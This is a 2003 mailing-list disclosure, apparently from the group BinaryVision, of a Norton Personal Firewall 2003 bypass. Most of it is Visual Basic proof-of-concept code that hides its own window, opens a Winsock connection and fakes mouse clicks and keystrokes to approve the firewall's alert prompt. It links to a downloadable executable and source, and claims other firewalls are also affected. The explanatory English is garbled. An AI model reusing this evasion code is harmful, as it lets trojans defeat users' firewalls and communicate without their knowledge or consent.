('binary' encoding is not supported, stored as-is) The Bug factor so lamb Firewall "ignored" from Trojan. The Trojan than himself in Firewall and so the actually Trojan worker without disturbance the of Firewall. I added a model in VB and EXE NortonEXE - http://iso.bbs.us:777/binaryvision/Norton/NortonEXE.zip NortonSRC- http://iso.bbs.us:777/binaryvision/Norton/NortonSRC.zip It is the code: Dim numNoWindows As Integer Dim CMD1 As Integer Const MOUSEEVENTF_MOVE = &H1 Const MOUSEEVENTF_LEFTDOWN = &H2 Const MOUSEEVENTF_LEFTUP = &H4 Const MOUSEEVENTF_RIGHTDOWN = &H8 Const MOUSEEVENTF_RIGHTUP = &H10 Const MOUSEEVENTF_MIDDLEDOWN = &H20 Const MOUSEEVENTF_MIDDLEUP = &H40 Const MOUSEEVENTF_WHEEL = &H800 Const MOUSEEVENTF_ABSOLUTE = &H8000 Private Type POINTAPI X As Long Y As Long End Type Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dX As Long, _ ByVal dY As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long) Private Points() As POINTAPI Private iCount As Long Private Const KLF_REORDER = &H8 Private Const lang_English = 67699721 Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, _ ByVal X As Long, ByVal Y As Long, ByVal CX As Long, ByVal CY As Long, ByVal wFlags As Long) As Long Private Const SW_HIDE = 0 ' sent to ShowWindow function Private Const SW_SHOW = 5 ' sent to ShowWindow function Private Const HWND_TOPMOST = -1 'sent to SetWindowPos function Private Const vbClass = "wndclass_desked_gsk" 'Visual Basic Class name Private Declare Function ActivateKeyboardLayout Lib "user32" (ByVal HKL As Long, ByVal flags As Long) As Long Private Sub Command1_Click() If Winsock2.State <> sckClosed Then Winsock2.Close Winsock2.Connect End Sub Private Sub Command2_Click() Winsock1.Listen End Sub Private Sub Form_Load() Dim lForm As Long lForm = Me.hwnd SetWindowPos lForm, HWND_TOPMOST, 0, 0, 0, 0, 1 X = Command If X = "" Then Shell (App.Path & "\" & App.EXEName & ".exe /Connect") Winsock2.Connect X = "" ElseIf X = "/Connect" Then X = "" Me.Hide Timer2.Enabled = True End If End Sub Private Sub Timer2_Timer() Dim hwnd As Long hwnd = FindWindow(vbNullString, "Norton Personal Firewall") If hwnd = 0 Then numNoWindows = numNoWindows + 1 If numNoWindows = 150 Then Timer2.Enabled = False End End If Else Call ActivateKeyboardLayout(lang_English, KLF_REORDER) X = Screen.Width * 2.7 Y = Screen.Height * 2.7 mouse_event MOUSEEVENTF_ABSOLUTE + MOUSEEVENTF_MOVE + MOUSEEVENTF_LEFTDOWN + MOUSEEVENTF_LEFTUP, Y, X, 0, 0 CMD1 = CMD1 + 1 If CMD1 = 1 Then Timer2.Interval = 300 ElseIf CMD1 = 2 Then SendKeys "{tab}" ElseIf CMD1 = 3 Then SendKeys " " ElseIf CMD1 = 4 Then SendKeys "{UP}" SendKeys "{UP}" SendKeys "{UP}" ElseIf CMD1 = 5 Then SendKeys "{ENTER}" Timer2.Enabled = False End End If End If End Sub Private Sub Winsock2_Connect() Winsock2.SendData "Msg-Box" End Sub Private Sub wHideShow(HideShow As Boolean) Dim hwnd As Long hwnd = FindWindow(vbNullString, "Norton Personal Firewall") 'if not found then.. If hwnd = 0 Then Exit Sub End If 'if not hidden - hide, else - show If HideShow Then ShowWindow hwnd, SW_SHOW Else ShowWindow hwnd, SW_SHOW End If End Sub The Bug can act on the any Firewalls that I recognize (zonealarm, BlackICE....) The full article situated here (in Hebrew): http://tankz.zext.net/binaryvision/index.php?title=bug%20in%20Norton% 20Firewall%202003&page=modules/articles/display.php&cat=Security&file=bug% 20in%20Norton%20Firewall%202003&right=modules/articles BoyBear From BinaryVision ( http://binaryvision.tech.nu )
This archive was generated by hypermail 2b30 : Mon Aug 11 2003 - 10:31:12 PDT